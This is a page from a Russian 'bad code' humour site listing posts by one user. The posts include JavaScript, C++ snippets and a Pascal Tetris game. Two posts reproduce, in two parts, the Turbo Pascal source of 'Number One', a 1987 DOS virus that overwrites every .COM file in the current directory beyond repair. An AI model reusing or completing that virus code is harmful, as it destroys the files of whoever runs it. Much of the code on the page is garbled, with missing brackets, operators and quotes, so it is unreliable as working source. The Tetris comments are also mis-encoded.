1. Список говнокодов пользователя dos_

    Всего: 26

  2. Куча / Говнокод #11276


    1. 1
    <a href="tariff.php">Расчет тарифа</a>

    dos_, 21 Июня 2012

    Комментарии (9)
  3. Куча / Говнокод #10984


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    function rechargePubSession(age,sexe)
      var url_pub_ban = "publicite_banniere";
      var url_pub_sky = "publicite_skyscrapper";
      var ext;
      if (age >0)
      if (age < 18)
      else if (age < 33)
      else if (age >= 33)
      if (ext!="")
        if (sexe == "F")
        else if (sexe == "M")
        if (sexe=="M" || sexe=="F")
        url_pub_ban += ext;
        url_pub_sky += ext;
      frame_pub_banniere.document.location= url_pub_ban;


    dos_, 16 Июня 2012

    Комментарии (4)
  4. Pascal / Говнокод #10539


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    { Infected it}
    BlockWrite(Go,PrograStart,Succ(VirusSize shr 7));
    { Say what has been done}
    WriteLn(UsePath +' infected.');
    Halt; {... and HALT the program}
    {The file has already been infected, search next}
    Reg.DS Seg(DTA);
    Reg.DX Ofs(DTA);
    {... Until no more files found}
    Until Odd(Reg.Flags);
    Write(''); { Give a smile}


    Вторая часть.

    dos_, 03 Июня 2012

    Комментарии (34)
  5. Pascal / Говнокод #10538


    1. 001
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    Number One
    This is a very primitiv computer virus.
    HANDLE WITH CARE! ----------- demonstration ONLY!
    Number One infect all.COM-file in the CURRENT directory.
    A warning message and the infected file's name will be displayed.
    That file has been overwritten with Number One's programm
    code and is not reconstructable!
    If all file s are infected or no .COM-files found, Number
    One gives you a .
    Files may be protected against infections of Number One by
    setting the READ ONLY attribute.
    Written 10.3.1987 by M.Vallen (Turbo-Pascal 3.01a)
    (c) 1987 by BrainLab
    {I-} { Do not allow an user Break, enable 10 check}
    VirusSize = 12027; { Number One's code size }
    Warning : String [42] { Warning massage }
    = 'This file has been infected by Number One's;
    {--Type declaration----------------------------------------------}
    DTARec = Record { Date area for }
    DOSnext : Array 1...21 of Byte; { file search }
    Attr : Byte;
    FHsize : Integer;
    FullName : Array 1...13 of Char;
    Registers = Record {Register set useed for file search}
    Case Byte of
    1: ( AX, BX, CX, DX, BP, SI, DI, DS, ES,Flags: Integer);
    2: ( AL, AH, BL, BH, CL, CH, DL, DH : Byte);
    ProgramStart : Byte absolute Cseg: $180; {Memory offset of program code}
    {Infection marker}
    MarkInfected : String 42 absolute Cseg: $180;
    Reg : Register; { Register set}
    DTA : DTARec; { Date area}
    Buffer :Array [Byte] of Byte; { Date buffer}
    TestID : String 42; {To recognize infected files}
    UsePath : String 66; { Path to search files}
    {Length of search path}
    UsePathLength: Byte absolute UsePath;
    Go : File; { File to infect}
    B : Byte; { Used }
    --Program code-------------------------------------------------------
    WriteLn(Warning); {Display Warning massage}
    GetDir(0,UsePath); { Get current directory}
    if Post ('', UsePath ) <> UsePathLengt then
    UsePath:= UsePath + '';
    UsePath:= UsePath + '*.COM'; { Define search mask}
    Reg.AH := $1A; { Set date area}
    Reg.DS Seg(DTA);
    Reg.DX Ofs(DTA);
    UsePath Succ(UsePathLength):=0; Path must end with =0
    Reg.AH := $4e;
    Reg.DS := Seg(UsePath);
    Reg.DX := Ofs(UsePath 1);
    Reg.CX :=$ff; {Set attribut to find ALL files}
    MsDos(Reg); { Find the first matching entry}
    If not Odd(Reg.Flags) Then { If a file found then...}
    B := Pos(#0,UsePath);
    If B> 0 Then
    Delete (UsePath,B,255); { Remove garbage}
    Assign(Go, UsePath);
    If IOresult=0 {If not error then}
    Move(Buffer $80,TestID, 43);
    {Test if file is already infected}
    If TestID<> Warning then { If not, then}
    {Mark file as infected and...}
    MarkInfected:= Warning;


    Первая часть.

    dos_, 03 Июня 2012

    Комментарии (17)
  6. C++ / Говнокод #10536


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    #include <iostream>
    #include <conio.h>
    using namespace std;
    char* find(char* str)
    	int i = 0, mlen=0;
    	char* minword = new char[100];
    	char* curword = new char[100];
    	while(str[i]==' ') i++;
    	mlen = i;
    	while((str[mlen]!=' ')&&(str[mlen])) mlen++;
    	mlen -= i;
    	strncpy(minword, str+i, mlen);
    	minword[mlen] = '\0';
    	i += mlen;
    		while(str[i]==' ') i++;
    		mlen = i;
    		while((str[mlen]!=' ')&&(str[mlen])) mlen++;
    		mlen -= i;
    		strncpy(curword, str+i, mlen);
    		curword[mlen] = '\0';
    		i += mlen;
    		if(strcmp(minword, curword) > 0)
    			strcpy(minword, curword);
    	return minword;
    void del(char*& str, char* str2)
    	int i = 0, j =0, st=0;
    	char* nstr = new char[200];
    			j = 0;
    				i++; j++;
    				strncpy(nstr, str+st, i-j);
    				nstr[i-j] = '\0';
    				st = i;
    	strcat(nstr, str+st);
    	str = nstr;
    void sort(char*& str)
    	int len = strlen(str);
    	char* nstr = new char[200];
    	char* buf = new char[200];
    	buf = find(str);
    	strcpy(nstr, buf);
    	del(str, buf);
    	while(strlen(nstr) != len)
    		buf = find(str);
    		strcat(nstr, " ");
    		strcat(nstr, buf);
    		del(str, buf);
    	nstr[len] = '\0';
    	str = nstr;
    void main()
    	char* str = new char[200];
    	str = "my little pony";

    Из вузовского компьютера.

    dos_, 03 Июня 2012

    Комментарии (18)
  7. C++ / Говнокод #10478


    1. 1
    int eger;

    dos_, 30 Мая 2012

    Комментарии (53)
  8. C++ / Говнокод #10387


    1. 1
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    vd mn()
    ct<<"Hll, wrld!";

    Нхй пргрммрвн.

    dos_, 29 Мая 2012

    Комментарии (28)
  9. Pascal / Говнокод #9068


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    program tetris;
      st:array[1..12] of array[1..22] of integer;
    procedure k(x,y:integer);
    {ђЁб㥬 Єў а¤а вЁЄ}
     if ss=0 then write('  ');
     if ss=1 then write('[]');
     if ss=2 then write(chr(177),chr(177));
     if (ss=3) and (st[x,y]>0) then pus:=1;
     if ss=4 then st[x,y]:=1;
     gotoxy(1,1);write(' ');
    procedure fig(x,y,n,s:integer);
    {ђЁб㥬 дЁЈгаг}
     if s=3 then pus:=0;
     ss:=s; k(x,y);
     if n=1 then begin k(x+1,y);k(x,y-1);k(x+1,y-1) end;
     if n=2 then begin k(x-1,y);k(x+1,y);k(x+2,y) end;
     if n=3 then begin k(x,y+1);k(x,y-1);k(x,y-2) end;
     if n=4 then begin k(x+1,y);k(x-1,y);k(x-1,y+1) end;
     if n=5 then begin k(x,y+1);k(x+1,y+1);k(x,y-1) end;
     if n=6 then begin k(x-1,y);k(x+1,y);k(x+1,y-1) end;
     if n=7 then begin k(x,y+1);k(x,y-1);k(x-1,y-1) end;
     if n=8 then begin k(x-1,y);k(x+1,y);k(x+1,y+1) end;
     if n=9 then begin k(x,y+1);k(x,y-1);k(x+1,y-1) end;
     if n=10 then begin k(x+1,y);k(x-1,y);k(x-1,y-1) end;
     if n=11 then begin k(x,y+1);k(x,y-1);k(x-1,y+1) end;
     if n=12 then begin k(x-1,y);k(x,y-1);k(x+1,y-1) end;
     if n=13 then begin k(x,y+1);k(x-1,y);k(x-1,y-1) end;
     if n=14 then begin k(x+1,y);k(x-1,y-1);k(x,y-1) end;
     if n=15 then begin k(x-1,y);k(x,y-1);k(x-1,y+1) end;
     if n=16 then begin k(x+1,y);k(x-1,y);k(x,y+1) end;
     if n=17 then begin k(x+1,y);k(x,y+1);k(x,y-1) end;
     if n=18 then begin k(x,y-1);k(x-1,y);k(x+1,y) end;
     if n=19 then begin k(x-1,y);k(x,y+1);k(x,y-1) end
    procedure pov;
    {Џ®ў®а®в дЁЈгал}
     if nn=15 then nn:=19;
     if nn=13 then nn:=15;
     if nn=11 then nn:=13;
     if nn=7 then nn:=11;
     if nn=3 then nn:=7;
     if nn=1 then nn:=3;
     if nn=0 then nn:=1;
    procedure clrst;
    {ЋзЁбвЄ  бв Є ­ }
     for x:=1 to 12 do
      for y:=1 to 22 do
       if (x=1) or (x=12) or (y=1) then st[x,y]:=2 else st[x,y]:=0;
    procedure risvesst;
    {ђЁб®ў вм ўҐбм бв Є ­}
     for x:=1 to 12 do  for y:=1 to 22 do
    procedure dvig;
     for i:=1 to 10 do
      key:=' ';
      if keypressed then key:=readkey;
      if key='i' then
       if pus=0 then begin fig(x,y,nn,0); x:=x-1; fig(x,y,nn,1); end;


    dos_, 10 Января 2012

    Комментарии (10)
  10. Куча / Говнокод #8878


    1. 1


    http://demiart.ru/forum/index.php?s=079089252ad62a33ea31e842aa83 e50a&showuser=15046

    dos_, 04 Января 2012

    Комментарии (61)
  11. Куча / Говнокод #8866


    1. 1

    Пирогет.КАПЧА: 9944

    dos_, 18 Декабря 2011

    Комментарии (7)